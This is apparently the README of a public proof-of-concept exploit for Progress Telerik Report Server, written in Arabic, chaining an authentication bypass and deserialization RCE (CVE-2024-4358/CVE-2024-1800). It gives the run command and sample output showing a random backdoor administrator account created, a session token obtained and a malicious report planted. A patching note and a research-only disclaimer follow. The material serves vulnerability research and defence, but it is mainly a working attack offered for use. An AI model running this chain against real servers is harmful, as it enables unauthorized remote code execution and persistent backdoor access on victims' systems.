
سلسلة RCE قبل المصادقة في Progress Telerik Report Server (CVE-2024-4358/CVE-2024-1800)
سلسلة استغلال لتجاوز المصادقة وإلغاء التسلسل في Telerik Report Server لثغرات CVE-2024-4358/CVE-2024-1800
يمكن العثور على تحليل السبب الجذري للثغرة على مدونتي poc
في الأساس جميعها وقت نشر الاستغلال، وللرجوع إليها مستقبلًا، كل الإصدارات الرئيسية والفرعية في القائمة أدناه:
2012
2017
2018
2019
2020
2021
2022
2023
2024
python CVE-2024-4358.py --target http://192.168.253.128:83 -c "whoami"
(^_^) Progress Telerik Report Server pre-authenticated RCE (CVE-2024-4358/CVE-2024-1800) || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) random backdoor username: oelycslyun
(*) random backdoor password: cqgnacxljo
(*) Attempting to bypass authentication
(+) Authentication bypass was successful, backdoor account created
(+) Saving credentials to credentials.txt
(+) Successfully authenticated as oelycslyun with password cqgnacxljo
(*) got token: zfCch_LNv0PyKfe7eBDYKXV70IOotwNQ2p82aX-JHIMCisVnTW9PWWYUKljhcRw5alubNOg_gXoHT6-hJk4VO-jGZuzmisLIi5A
(*) Generated random report name: qvwdycugmc
(*) Creating malicious report under name qvwdycugmc
(*) Deserialization exploit finished
قم بالتحديث إلى أحدث إصدار، أو خفّف من المخاطر باتباع التعليمات الواردة في النشرة الاستشارية الصادرة عن Progress:
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود منه استخدامه لمهاجمة الأنظمة إلا بتصريح صريح. القائمون على المشروع غير مسؤولين عن سوء استخدام البرنامج. استخدمه بمسؤولية.